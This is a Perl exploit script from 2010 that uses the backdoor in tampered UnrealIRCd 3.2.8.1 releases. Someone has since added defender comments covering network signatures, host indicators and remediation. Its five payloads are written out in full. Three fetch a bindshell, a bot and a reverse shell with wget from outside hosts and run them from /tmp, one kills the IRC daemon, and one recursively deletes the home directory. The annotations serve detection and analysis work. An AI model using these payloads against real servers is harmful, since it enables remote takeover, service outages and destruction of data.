# Title : Unreal IRCD 3.2.8.1 Remote Downloader/Execute Trojan
# Published : 2010-06-13
# Author : anonymous
#!/usr/bin/perl
# Unreal3.2.8.1 Remote Downloader/Execute Trojan
# DO NOT DISTRIBUTE -PRIVATE-
# -iHaq (2l8)
use Socket;
use IO::Socket;
## Payload options
# Five fixed strings, one of which is written verbatim to the target socket.
# Every string starts with the marker "AB;" and the remainder is shell command
# text. This matches the publicly documented backdoor in tampered
# Unreal3.2.8.1 source tarballs, where data following that marker was handed
# to a shell by the ircd process. A correctly built server from a verified
# release is expected to treat the same bytes as an unknown command.
#
# What each string asks the shell to do (read directly from the literals):
#   $payload1..3 - cd to /tmp, fetch a file with wget from a hard-coded URL,
#                  chmod +x it, and start it in the background.
#   $payload4    - killall ircd (service outage only).
#   $payload5    - recursive rm of the ircd account's home directory contents.
#
# Defender notes:
#   - Network: the marker arrives as the first client bytes on a new
#     connection to the IRC port, so a signature on a leading "AB;" covers
#     this script's traffic.
#   - Host: look for the ircd process spawning sh/wget/chmod, for new
#     executables under /tmp owned by the ircd account, and for unexpected
#     outbound HTTP from the IRC host. The URLs below are the indicators this
#     listing carries.
#   - Remediation: check the installed source/tarball against the checksum or
#     signature published by the project, rebuild from a verified release, run
#     ircd under a dedicated unprivileged account, and restrict its egress.
my $payload1 = 'AB; cd /tmp; wget http://packetstormsecurity.org/groups/synnergy/bindshell-unix -O bindshell; chmod +x bindshell; ./bindshell &';
my $payload2 = 'AB; cd /tmp; wget http://efnetbs.webs.com/bot.txt -O bot; chmod +x bot; ./bot &';
my $payload3 = 'AB; cd /tmp; wget http://efnetbs.webs.com/r.txt -O rshell; chmod +x rshell; ./rshell &';
my $payload4 = 'AB; killall ircd';
my $payload5 = 'AB; cd ~; /bin/rm -fr ~/*;/bin/rm -fr *';
# Command-line arguments: <host> <port> <type>. These are package globals
# (no `use strict` / `use warnings` appears in this listing) and are read
# later by unreal_trojan().
$host = "";
$port = "";
$type = "";
# @ARGV[N] is a one-element array slice; in scalar assignment it yields the
# element, or undef when the argument is missing.
$host = @ARGV[0];
$port = @ARGV[1];
$type = @ARGV[2];
# A missing argument is undef, which compares equal to "" under `eq`, so each
# check falls through to usage(), which exits.
if ($host eq "") { usage(); }
if ($port eq "") { usage(); }
if ($type eq "") { usage(); }
# usage: print the command-line synopsis and the numbered payload menu, then
# terminate the process with exit status 1. Takes no arguments and never
# returns to the caller.
#
# NOTE(review): the strings end in a literal "n" where a line break would be
# expected; presumably the "\n" escapes were lost when the page was extracted.
# NOTE(review): menu labels [2] and [3] are in the opposite order to
# $payload2 (fetches "bot") and $payload3 (fetches "rshell") as defined above.
sub usage {
printf "nUsage :n";
printf "perl unrealpwn.pl <host> <port> <type>nn";
printf "Command list :n";
printf "[1] - Perl Bindshelln";
printf "[2] - Perl Reverse Shelln";
printf "[3] - Perl Botn";
printf "-----------------------------n";
printf "[4] - shutdown ircservern";
printf "[5] - delete ircservern";
exit(1);
}
# unreal_trojan: open one TCP connection to the global $host:$port, write the
# payload string selected by the global $type, close the socket and exit.
#
# Observable behaviour, useful when writing detections:
#   - Nothing else is sent: there is no NICK/USER registration and no read
#     from the socket, so the payload string is the only client data on the
#     connection.
#   - The string is written without a trailing line terminator.
#   - The script cannot tell whether the target acted on the string; it reads
#     no response.
sub unreal_trojan {
my $ircserv = $host;
my $ircport = $port;
# Dies with a message if the TCP connection cannot be established.
my $sockd = IO::Socket::INET->new (PeerAddr => $ircserv, PeerPort => $ircport, Proto => "tcp") || die "Failed to connect to $ircserv on $ircport ...nn";
# Printed before anything is written and before $type is validated, so this
# message does not confirm delivery.
print "[+] Payload sent ...n";
# $type is compared as a string against "1".."5"; anything else prints an
# error and calls usage(), which exits without closing the socket explicitly.
if ($type eq "1") {
print $sockd "$payload1";
} elsif ($type eq "2") {
print $sockd "$payload2";
} elsif ($type eq "3") {
print $sockd "$payload3";
} elsif ($type eq "4") {
print $sockd "$payload4";
} elsif ($type eq "5") {
print $sockd "$payload5";
} else {
printf "nInvalid Option ...nn";
usage();
}
close($sockd);
# Exit status is 1 on every path, including after a completed write.
exit(1);
}
# Entry point: reached only when all three arguments were supplied, because
# the earlier checks call usage() (which exits) otherwise.
unreal_trojan();
# EOF